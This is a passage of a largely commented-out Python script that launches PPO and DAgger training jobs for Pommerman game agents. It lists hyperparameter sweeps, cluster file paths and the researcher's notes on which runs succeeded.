# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# ### These are like the above but additioanlyl distills from DaggerAgent
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "initexuvl", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "distill-expert": "DaggerAgent", "distill-epochs": 10000,
# "distill-target": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "distill-expert": "DaggerAgent", "distill-epochs": 10000,
# "distill-target": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "DaggerAgent", "distill-epochs": 10000,
# "distill-target": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "DaggerAgent", "distill-epochs": 10000,
# "distill-target": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
### These are trying to do homogenous training on EasyEnv but distilling from SimpleAgent
# These didn't work. They all went to random.
# train_ppo_job({ # Batch size of 400
# "num-processes": 8, "run-name": "homoeasy", "how-train": "homogenous",
# "log-interval": 150, "lr": 0.0003, "num-steps": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 10000, "distill-expert": "SimpleAgent",
# "config": "PommeTeamEasy-v0", "eval-mode": "homogenous", "gamma": ".995",
# "num-battles-eval": 50, "num-mini-batch": 2, "model-str": "PommeCNNPolicySmaller",
# "half-lr-epochs": 5000, "use-gae": ""
# }, "pmanhomo")
# train_ppo_job({ # Batch size of 600
# "num-processes": 8, "run-name": "homoeasy", "how-train": "homogenous",
# "log-interval": 150, "lr": 0.0003, "num-steps": 150,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 10000, "distill-expert": "SimpleAgent",
# "config": "PommeTeamEasy-v0", "eval-mode": "homogenous", "gamma": ".995",
# "num-battles-eval": 50, "num-mini-batch": 2, "model-str": "PommeCNNPolicySmaller",
# "half-lr-epochs": 5000, "use-gae": ""
# }, "pmanhomo")
# train_ppo_job({ # Batch size of 400
# "num-processes": 8, "run-name": "homoeasy", "how-train": "homogenous",
# "log-interval": 150, "lr": 0.0003, "num-steps": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 10000, "distill-expert": "SimpleAgent",
# "config": "PommeTeamEasy-v0", "eval-mode": "homogenous", "gamma": ".995",
# "num-battles-eval": 50, "num-mini-batch": 2, "model-str": "PommeCNNPolicySmall",
# "half-lr-epochs": 5000, "use-gae": ""
# }, "pmanhomo")
# train_ppo_job({ # Batch size of 600
# "num-processes": 8, "run-name": "homoeasy", "how-train": "homogenous",
# "log-interval": 150, "lr": 0.0003, "num-steps": 150,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 10000, "distill-expert": "SimpleAgent",
# "config": "PommeTeamEasy-v0", "eval-mode": "homogenous", "gamma": ".995",
# "num-battles-eval": 50, "num-mini-batch": 2, "model-str": "PommeCNNPolicySmall",
# "half-lr-epochs": 5000, "use-gae": ""
# }, "pmanhomo")
### Dagger agents on the easy env.
# These had good results in the tensorboard but were terrible when I ran eval.
# For example:
# CUDA_VISIBLE_DEVICES=0 python eval.py --eval-targets
# ppo::/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-easydag.dagger.PommeTeamEasy-v0.PommeCNNPolicySmall.nc256.lr0.003.mb275.ne20.prob0.5.nopt1.epoch1050.steps840800.seed1.pt
# --eval-opponents simple::null,simple::null --num-battles-eval 100 --config PommeTeamEasy-v0
# --cuda-device 0 --eval-mode team-simple --model-str PommeCNNPolicySmall
# had a 37% success rate in the TB but yielded 25 / 25 / 60 for w/l/t.
# CUDA_VISIBLE_DEVICES=0 python eval.py --eval-targets
# ppo::/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-easyexuvl.dagger.PommeTeamEasy-v0.PommeCNNPolicySmaller.nc256.lr0.003.mb275.ne20.prob0.5.nopt1.epoch900.steps720800.seed1.pt
# --eval-opponents simple::null,simple::null --num-battles-eval 100 --config PommeTeamEasy-v0
# --cuda-device 0 --eval-mode team-simple --model-str PommeCNNPolicySmaller
# had a 37% success rate in the TB but yielded 24 / 25 / 61.
# train_dagger_job(
# {"num-processes": 8, "run-name": "easyexuvl", "how-train": "dagger", "num-episodes-dagger": 20,
# "log-interval": 50, "minibatch-size": 275, "save-interval": 50, "lr": 0.003, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamEasy-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "easyexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "easydag", "how-train": "dagger", "num-episodes-dagger": 20, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.003, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamEasy-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "easydag"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "easyexuvl", "how-train": "dagger", "num-episodes-dagger": 20,
# "log-interval": 50, "minibatch-size": 275, "save-interval": 50, "lr": 0.003, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamEasy-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "easyexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "easydag", "how-train": "dagger", "num-episodes-dagger": 20, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.003, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamEasy-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "easydag"
# )
### FB Cluster Runs: These distill simple agent into PPO on the 1000 FFA dataset. Can we overfit?
# It appears that at least two of these did pretty darn well. The signatures for those:
# Both use gae, both use .99, and both have an LR of less than 1e-3
#
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0001,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0001,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .001,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .001,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0003,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0003,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0001,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0001,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .001,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .001,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0003,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0003,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
### This is a follow up to the experiments above
# It's a cartesian product of:
# {5000 distill, 2000 distill, no distill}, {LR of 7e-4, 3e-4}, and gamma of {.99, .995}
# except that the 5000 distill does not use the do {5000, 3e-4, .99} because it's already
# accounted for in the above.
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21", "use-gae": ""
# }
# counter = 0
# for learning_rate in [7e-4, 3e-4]:
# for gamma in [.99, .995]:
# for distill in [0, 2000, 5000]:
# if distill == 5000 and gamma == .99 and learning_rate == 3e-4:
# continue
# if distill:
# run_name = "pmansmpdst"
# job["distill-epochs"] = distill
# job["distill-expert"] = "SimpleAgent"
# else:
# run_name = "pmansmp"
# job["run-name"] = run_name + "-%d" % counter
# job["gamma"] = gamma
# job["lr"] = learning_rate
# train_ppo_job(job, "pmansmp-%d" % counter, is_fb=True)
# counter += 1
### These are the distill 0s from above. I fucked up and ran them incorrectly, so redoing here.
# job = {
# "num-processes": 40, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21", "use-gae": ""
# }
# counter = 0
# for learning_rate in [7e-4, 3e-4]:
# for gamma in [.99, .995]:
# for distill in [0]:
# run_name = "pmansmp"
# j = {k:v for k,v in job.items()}
# j["run-name"] = run_name + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, "pmansmp-%d" % counter, is_fb=True)
# counter += 1
### This is a further follow up to the experiments above using a bigger number of games (10000)
# It's a cartesian product of {5000 distill, 2000 distill, no distill}, {LR of 7e-4, 3e-4, 1e-4}, and gamma of {.99, .995}
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# "state-directory-distribution": "uniform21", "use-gae": ""
# }
# counter = 0
# for learning_rate in [7e-4, 3e-4, 1e-4]:
# for gamma in [.99, .995]:
# for distill in [0, 2000, 5000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman10k-%d" % counter
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### This is a follow up to the experiments two above using a longer uniform of 33.
# It's a cartesian product of {5000 distill, 2000 distill, no distill}, {LR of 7e-4, 3e-4, 1e-4}, and gamma of {.99, .995}
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform33", "use-gae": ""
# }
# counter = 0
# for learning_rate in [7e-4, 3e-4, 1e-4]:
# for gamma in [.99, .995]:
# for distill in [0, 2000, 5000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman1k33-%d" % counter
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are testing out the 8x8 agent to see if maybe PPO can work on that,
# possibly with a classification loss. These worked Really well!!!
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFA8x8-v0", "board-size": 8,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# # "eval-mode": "ffa-curriculum"
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4]:
# for gamma in [.99, .995]:
# for distill in [0, 2500]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman8x8-%d" % counter
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### More uniform experiments, this time uniform66 and uniformAdapt with 10k.
# 66 killed it! uniformAdapt I fucked upa nd am rerunning (see below)
# Cartesian product of {3000 distill, no distill}, {LR of 1e-4, 3e-5} and gamma of {.99, .995}
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# }
# counter = 0
# for learning_rate in [1e-4, 3e-5]:
# for gamma in [.99, .995]:
# for distill in [0, 3000]:
# for (name, distro) in [("u66", "uniform66")]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman%s-%d" % (name, counter)
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are anneal bomb reward models.
# These didnt' work very well. They worked slightly better than the origianl, but still not
# well enough.
# Cartesian product of {3000 distill, no distill}, {LR of 1e-4, 3e-5} and gamma of {.99, .995}
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4, 3e-5]:
# for gamma in [.99, .995]:
# for distill in [0, 3000]:
# for anneal_bomb_penalty_epochs in [100, 1000, 5000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pmanABPE-%d" % counter
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# j["anneal-bomb-penalty-epochs"] = anneal_bomb_penalty_epochs
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### More uniform experiments, this time uniformAdapt and uniformScheduleA with 10k.
# Cartesian product of {3000 distill, no distill}, {LR of 1e-4, 6e-5} and gamma of {.99, .995}
# NOTE: The uniformAdpt on these use running_success_max_len=40. That's a lot (800 epochs).
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.99, .995]:
# for distill in [0, 3000]:
# for (name, distro) in [("uSchA", "uniformScheduleA"), ("uAdpt", "uniformAdapt")]:
# for num_processes in [25, 50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are the uniformAdapt as above but with ~200 epochs running_success_max_len=10, so roughly 4x faster. Also only running one gamma and no distill beause that seems to be ok.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.99]:
# for distill in [0]:
# for (name, distro) in [("uAdpt10", "uniformAdapt")]:
# for num_processes in [25, 50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### This is a uniform66 test to see if we can run higher processor numbers (corresponding lower numsteps)
# It worked and is arguably better because it's faster.
# job = {
# "num-processes": 50, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.99, .995]:
# for distill in [0, 3000]:
# for (name, distro) in [("u66", "uniform66")]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman%s-%d-hnp" % (name, counter)
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.99, .995]:
# for distill in [0]:
# for (name, distro) in [("uBndsA", "uniformBoundsA"), ("uBndsB", "uniformBoundsB")]:
# for num_processes in [25, 50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# These are testing out the 8x8 agent to see if maybe PPO can work on that,
# possibly with a classification loss. These are on the no sjull set up though.
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFA8x8-v0", "board-size": 8,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
